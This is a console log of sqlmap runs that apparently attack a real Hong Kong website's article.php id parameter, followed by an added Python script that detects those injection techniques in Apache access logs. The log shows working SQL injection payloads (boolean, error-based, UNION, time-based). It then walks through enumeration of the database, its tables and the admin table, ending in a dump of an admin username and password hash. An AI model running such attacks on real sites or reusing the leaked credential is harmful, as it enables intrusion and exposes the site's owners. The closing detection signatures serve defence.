D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0 /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
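Every one of the five runs above replays the same four injection techniques against the `id` parameter, and each technique leaves a recognisable footprint in the web server's access log: a tautology such as `AND 799=799`, a `FLOOR(RAND(0)*2) ... GROUP BY` subquery, `UNION ALL SELECT NULL, ...`, or `SLEEP(5)`. The following Python script is an added example, not part of the original post and not sqlmap's own code: it parses Apache common-log-format lines, URL-decodes each request's query string and tags it with the technique whose signature it carries, then builds a per-client summary. The log lines, client address and timestamps are constructed for the example; the signatures are taken from the payloads sqlmap printed above.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the four techniques sqlmap reported against article.php?id.
# Each is matched against the URL-decoded, upper-cased query string.
SIGNATURES = {
    # boolean-based blind: "AND <n>=<n>" with the same number on both sides
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b"),
    # error-based: duplicate-key trick built from FLOOR(RAND(0)*2) and GROUP BY
    "error-based": re.compile(r"FLOOR\(\s*RAND\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY"),
    # UNION query: column-count probing with NULL placeholders
    "UNION query": re.compile(r"UNION\s+(ALL\s+)?SELECT\s+NULL"),
    # time-based blind: a deliberate delay in the WHERE clause
    "time-based blind": re.compile(r"\b(SLEEP|BENCHMARK)\s*\("),
}

# Apache common/combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def classify_query(path):
    """Return the techniques whose signature appears in the request path."""
    if "?" not in path:
        return []
    query = path.split("?", 1)[1]
    # Decode twice: sqlmap may double-encode, and a second pass on plain text is harmless.
    query = unquote_plus(unquote_plus(query)).upper()
    return [name for name, pattern in SIGNATURES.items() if pattern.search(query)]


def scan_access_log(lines):
    """Return one record per request that matches at least one signature."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in common log format
        techniques = classify_query(match.group("path"))
        if techniques:
            hits.append({
                "ip": match.group("ip"),
                "status": match.group("status"),
                "path": match.group("path"),
                "techniques": techniques,
            })
    return hits


def attacker_profile(hits):
    """Map each client address to the set of techniques it attempted."""
    profile = {}
    for hit in hits:
        profile.setdefault(hit["ip"], set()).update(hit["techniques"])
    return profile


# Constructed sample log: one legitimate request followed by one probe per technique.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2000:16:53:54 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2000:16:53:54 +0800] "GET /article.php?id=276%20AND%20799%3D799 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2000:16:53:55 +0800] "GET /article.php?id=276%20AND%20SLEEP%285%29 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2000:16:53:56 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%23 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2000:16:53:57 +0800] "GET /article.php?id=276%20AND%20%28SELECT%208404%20FROM%28SELECT%20COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29 HTTP/1.1" 500 220',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], ", ".join(hit["techniques"]), hit["path"])
    print(attacker_profile(scan_access_log(SAMPLE_LOG)))
```

The error-based probe is the one most likely to show up with a 500 status, because it depends on MySQL raising a duplicate-key error; the boolean and time-based probes return the normal page and are only visible through the query string (or, for `SLEEP`, through response time), which is why decoding and inspecting the query string matters more than filtering on status codes alone.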